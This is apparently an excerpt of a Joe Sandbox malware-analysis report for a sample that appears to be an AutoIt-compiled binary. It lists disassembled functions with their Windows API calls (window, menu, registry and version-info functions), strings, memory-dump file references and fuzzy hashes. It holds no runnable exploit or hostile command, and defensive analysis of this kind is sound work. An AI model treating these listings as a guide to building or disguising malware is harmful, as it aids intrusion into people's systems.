                                                                                                                        • DrawFocusRect.USER32(?,?), ref: 00EBD4F8
                                                                                                                        • GetSysColor.USER32(00000011), ref: 00EBD506
                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00EBD50E
                                                                                                                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00EBD522
                                                                                                                        • SelectObject.GDI32(?,00EBD0B5), ref: 00EBD539
                                                                                                                        • DeleteObject.GDI32(?), ref: 00EBD544
                                                                                                                        • SelectObject.GDI32(?,?), ref: 00EBD54A
                                                                                                                        • DeleteObject.GDI32(?), ref: 00EBD54F
                                                                                                                        • SetTextColor.GDI32(?,?), ref: 00EBD555
                                                                                                                        • SetBkColor.GDI32(?,?), ref: 00EBD55F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1996641542-0
                                                                                                                        • Opcode ID: 589df55501ccbada5550193fe7b9d23f1c10b6e80e368462587c2f141423738c
                                                                                                                        • Instruction ID: 7cf7ac8cd326e57aca96aed232adfe463c3f199bc64e764ba148d33d7c120b19
                                                                                                                        • Opcode Fuzzy Hash: 589df55501ccbada5550193fe7b9d23f1c10b6e80e368462587c2f141423738c
                                                                                                                        • Instruction Fuzzy Hash: 6E516C71906218EFDF109FA9EC48EEE7BB9FB08320F104516F925BB2A1D7719940CB50
                                                                                                                        Function 00EBB4D4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00EBB5C0
                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EBB5D1
                                                                                                                        • CharNextW.USER32(0000014E), ref: 00EBB600
                                                                                                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00EBB641
                                                                                                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00EBB657
                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EBB668
                                                                                                                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00EBB685
                                                                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00EBB6D7
                                                                                                                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00EBB6ED
                                                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00EBB71E
                                                                                                                        • _memset.LIBCMT ref: 00EBB743
                                                                                                                        • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00EBB78C
                                                                                                                        • _memset.LIBCMT ref: 00EBB7EB
                                                                                                                        • SendMessageW.USER32 ref: 00EBB815
                                                                                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 00EBB86D
                                                                                                                        • SendMessageW.USER32(?,0000133D,?,?), ref: 00EBB91A
                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00EBB93C
                                                                                                                        • GetMenuItemInfoW.USER32(?), ref: 00EBB986
                                                                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00EBB9B3
                                                                                                                        • DrawMenuBar.USER32(?), ref: 00EBB9C2
                                                                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00EBB9EA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 1073566785-4108050209
                                                                                                                        • Opcode ID: 479fd0796f901431a0ce3b95c005370dd96fb8d2d408089f0b2e25db6351194e
                                                                                                                        • Instruction ID: f01028fbe63a2f1a0be9f36b0576cc7e92958289b29e1350f5419e62775f4c75
                                                                                                                        • Opcode Fuzzy Hash: 479fd0796f901431a0ce3b95c005370dd96fb8d2d408089f0b2e25db6351194e
                                                                                                                        • Instruction Fuzzy Hash: AEE19B70901218AFDB219F55CC84EEF7BB9FF05314F10915AFA19BA290DBB08A85DF61
                                                                                                                        Function 00EB744C Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCursorPos.USER32(?), ref: 00EB7587
                                                                                                                        • GetDesktopWindow.USER32 ref: 00EB759C
                                                                                                                        • GetWindowRect.USER32(00000000), ref: 00EB75A3
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00EB7605
                                                                                                                        • DestroyWindow.USER32(?), ref: 00EB7631
                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00EB765A
                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EB7678
                                                                                                                        • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00EB769E
                                                                                                                        • SendMessageW.USER32(?,00000421,?,?), ref: 00EB76B3
                                                                                                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00EB76C6
                                                                                                                        • IsWindowVisible.USER32(?), ref: 00EB76E6
                                                                                                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00EB7701
                                                                                                                        • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00EB7715
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00EB772D
                                                                                                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 00EB7753
                                                                                                                        • GetMonitorInfoW.USER32 ref: 00EB776D
                                                                                                                        • CopyRect.USER32(?,?), ref: 00EB7784
                                                                                                                        • SendMessageW.USER32(?,00000412,00000000), ref: 00EB77EF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                        • String ID: ($0$tooltips_class32
                                                                                                                        • API String ID: 698492251-4156429822
                                                                                                                        • Opcode ID: a5e9766e5b906d27663260845ede9a6a6050cc6cde016d9d953ba422b0d2faeb
                                                                                                                        • Instruction ID: c20f86c0179b34c006057fb503ad83d9f9e470e77da8d610f2a0fe59b70da9d8
                                                                                                                        • Opcode Fuzzy Hash: a5e9766e5b906d27663260845ede9a6a6050cc6cde016d9d953ba422b0d2faeb
                                                                                                                        • Instruction Fuzzy Hash: 75B19D71608310AFDB14DF65D944BABBBE5FF88314F00991DF599AB291DB70E804CB91
                                                                                                                        Function 00E976DB Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00E976ED
                                                                                                                        • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00E97713
                                                                                                                        • _wcscpy.LIBCMT ref: 00E97741
                                                                                                                        • _wcscmp.LIBCMT ref: 00E9774C
                                                                                                                        • _wcscat.LIBCMT ref: 00E97762
                                                                                                                        • _wcsstr.LIBCMT ref: 00E9776D
                                                                                                                        • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00E97789
                                                                                                                        • _wcscat.LIBCMT ref: 00E977D2
                                                                                                                        • _wcscat.LIBCMT ref: 00E977D9
                                                                                                                        • _wcsncpy.LIBCMT ref: 00E97804
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                        • API String ID: 699586101-1459072770
                                                                                                                        • Opcode ID: 0db7f27845cf4e4b0f91613e5798d288ddaff58e04b8a412d7801b825223ea97
                                                                                                                        • Instruction ID: 057dd70d8051cde7489c6aa75aaef9272cb3585567c07a696f15f36c837ada0e
                                                                                                                        • Opcode Fuzzy Hash: 0db7f27845cf4e4b0f91613e5798d288ddaff58e04b8a412d7801b825223ea97
                                                                                                                        • Instruction Fuzzy Hash: 55413471908304BAEB05A7649C47EBF77ECDF55710F10A09AF908B6192FB70EA05A6A1
                                                                                                                        Function 00E6A756 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E6A839
                                                                                                                        • GetSystemMetrics.USER32(00000007), ref: 00E6A841
                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E6A86C
                                                                                                                        • GetSystemMetrics.USER32(00000008), ref: 00E6A874
                                                                                                                        • GetSystemMetrics.USER32(00000004), ref: 00E6A899
                                                                                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00E6A8B6
                                                                                                                        • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 00E6A8C6
                                                                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00E6A8F9
                                                                                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00E6A90D
                                                                                                                        • GetClientRect.USER32(00000000,000000FF), ref: 00E6A92B
                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00E6A947
                                                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00E6A952
                                                                                                                          • Part of subcall function 00E6B736: GetCursorPos.USER32(000000FF), ref: 00E6B749
                                                                                                                          • Part of subcall function 00E6B736: ScreenToClient.USER32(00000000,000000FF), ref: 00E6B766
                                                                                                                          • Part of subcall function 00E6B736: GetAsyncKeyState.USER32(00000001), ref: 00E6B78B
                                                                                                                          • Part of subcall function 00E6B736: GetAsyncKeyState.USER32(00000002), ref: 00E6B799
                                                                                                                        • SetTimer.USER32(00000000,00000000,00000028,00E6ACEE), ref: 00E6A979
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                        • String ID: AutoIt v3 GUI
                                                                                                                        • API String ID: 1458621304-248962490
                                                                                                                        • Opcode ID: fd34ca33be7bed57bad81f8624e31cefd7cf1a767c11bbfc45c4db97f0265766
                                                                                                                        • Instruction ID: 2b8daf60d2c9440d0e8b354d82242546bbfed784bf3073f45bf70e75bed767ab
                                                                                                                        • Opcode Fuzzy Hash: fd34ca33be7bed57bad81f8624e31cefd7cf1a767c11bbfc45c4db97f0265766
                                                                                                                        • Instruction Fuzzy Hash: 57B16835A4020AAFDB14DFA8ED45BEA7BA4FB08354F15922AFA15B7290D730E841CF51
                                                                                                                        Function 00EB352A Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EB3626
                                                                                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,00EEDBF0,00000000,?,00000000,?,?), ref: 00EB3694
                                                                                                                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00EB36DC
                                                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00EB3765
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00EB3A85
                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00EB3A92
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Close$ConnectCreateRegistryValue
                                                                                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                        • API String ID: 536824911-966354055
                                                                                                                        • Opcode ID: 7d306ed3fa1241bd03d3c1167ab18295ad1b7a9681ed2a7686c51c14199d8806
                                                                                                                        • Instruction ID: e5fa821a2caf39e7b4cf9442dedc09231110b5a213c366a262c96bf5a157c24b
                                                                                                                        • Opcode Fuzzy Hash: 7d306ed3fa1241bd03d3c1167ab18295ad1b7a9681ed2a7686c51c14199d8806
                                                                                                                        • Instruction Fuzzy Hash: 40027A752046119FCB14EF24C995E6AB7E5FF88320F04985DF98AAB3A1DB30ED05CB42
                                                                                                                        Function 00EB69C5 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00EB6A52
                                                                                                                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00EB6B12
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BuffCharMessageSendUpper
                                                                                                                        • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                        • API String ID: 3974292440-719923060
                                                                                                                        • Opcode ID: 8a3728947a78f8f66738c9276522d533bc672a6b50cd18f71ef48da7e9320cfc
                                                                                                                        • Instruction ID: 3fb379ba72a7f3428e82c10a34d7228f11c0fe7bb70325b1c735faeed56bcd70
                                                                                                                        • Opcode Fuzzy Hash: 8a3728947a78f8f66738c9276522d533bc672a6b50cd18f71ef48da7e9320cfc
                                                                                                                        • Instruction Fuzzy Hash: 1CA161702443019FCB08EF14D951AAAB7E5FF45354F14A869F9A6BB2D2DB34EC09CB41
                                                                                                                        Function 00E8DD46 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00E8DD87
                                                                                                                        • __swprintf.LIBCMT ref: 00E8DE28
                                                                                                                        • _wcscmp.LIBCMT ref: 00E8DE3B
                                                                                                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00E8DE90
                                                                                                                        • _wcscmp.LIBCMT ref: 00E8DECC
                                                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00E8DF03
                                                                                                                        • GetDlgCtrlID.USER32(?), ref: 00E8DF55
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00E8DF8B
                                                                                                                        • GetParent.USER32(?), ref: 00E8DFA9
                                                                                                                        • ScreenToClient.USER32(00000000), ref: 00E8DFB0
                                                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00E8E02A
                                                                                                                        • _wcscmp.LIBCMT ref: 00E8E03E
                                                                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00E8E064
                                                                                                                        • _wcscmp.LIBCMT ref: 00E8E078
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                                                                        • String ID: %s%u
                                                                                                                        • API String ID: 3119225716-679674701
                                                                                                                        • Opcode ID: c5042441fadb2c7f54f15fdfe9d8d0ea315620f2a9f9ddb4b941900b991809b7
                                                                                                                        • Instruction ID: 0131c4cc821d9ebd8ff2eea96b7b09f4b4b980871060b345bc262ad0c6059017
                                                                                                                        • Opcode Fuzzy Hash: c5042441fadb2c7f54f15fdfe9d8d0ea315620f2a9f9ddb4b941900b991809b7
                                                                                                                        • Instruction Fuzzy Hash: 9FA1C171208706AFD715EF64CC84BAAB7E8FF44314F009919FA9DE6291DB30E945CB91
                                                                                                                        Function 00E8E69D Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetClassNameW.USER32(00000008,?,00000400), ref: 00E8E6E1
                                                                                                                        • _wcscmp.LIBCMT ref: 00E8E6F2
                                                                                                                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 00E8E71A
                                                                                                                        • CharUpperBuffW.USER32(?,00000000), ref: 00E8E737
                                                                                                                        • _wcscmp.LIBCMT ref: 00E8E755
                                                                                                                        • _wcsstr.LIBCMT ref: 00E8E766
                                                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00E8E79E
                                                                                                                        • _wcscmp.LIBCMT ref: 00E8E7AE
                                                                                                                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 00E8E7D5
                                                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00E8E81E
                                                                                                                        • _wcscmp.LIBCMT ref: 00E8E82E
                                                                                                                        • GetClassNameW.USER32(00000010,?,00000400), ref: 00E8E856
                                                                                                                        • GetWindowRect.USER32(00000004,?), ref: 00E8E8BF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                        • String ID: @$ThumbnailClass
                                                                                                                        • API String ID: 1788623398-1539354611
                                                                                                                        • Opcode ID: 0fa399af60b68156ef1704ac0e98befae90cd2f9c90f750fdd5a4b05c49be8c2
                                                                                                                        • Instruction ID: 605385979c72f8fd349aef0b66d0d4d8d8e0e96cdd58f5c610970baad4794257
                                                                                                                        • Opcode Fuzzy Hash: 0fa399af60b68156ef1704ac0e98befae90cd2f9c90f750fdd5a4b05c49be8c2
                                                                                                                        • Instruction Fuzzy Hash: 9C8180710083459FDB15EF10D885BAA7BD8EF84318F04A4AAFD9DBA192DB30DD45CBA1
                                                                                                                        Function 00E8E4EA Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __wcsnicmp
                                                                                                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                        • API String ID: 1038674560-1810252412
                                                                                                                        • Opcode ID: c2a11cb9602f44062a35b33c41ecd4dc95575dc0c856fedc9a499691b414efad
                                                                                                                        • Instruction ID: 348e338aee9db11b4a0046b54185ae7d6605e8f9852a6df48e11199339cab5d4
                                                                                                                        • Opcode Fuzzy Hash: c2a11cb9602f44062a35b33c41ecd4dc95575dc0c856fedc9a499691b414efad
                                                                                                                        • Instruction Fuzzy Hash: C531E031904305A6EB18FB50DD13EEE73E45F20719F206428F959711D1FF51AF08A622
                                                                                                                        Function 00E8F898 Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadIconW.USER32(00000063), ref: 00E8F8AB
                                                                                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00E8F8BD
                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 00E8F8D4
                                                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00E8F8E9
                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00E8F8EF
                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00E8F8FF
                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00E8F905
                                                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00E8F926
                                                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00E8F940
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00E8F949
                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 00E8F9B4
                                                                                                                        • GetDesktopWindow.USER32 ref: 00E8F9BA
                                                                                                                        • GetWindowRect.USER32(00000000), ref: 00E8F9C1
                                                                                                                        • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00E8FA0D
                                                                                                                        • GetClientRect.USER32(?,?), ref: 00E8FA1A
                                                                                                                        • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00E8FA3F
                                                                                                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00E8FA6A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
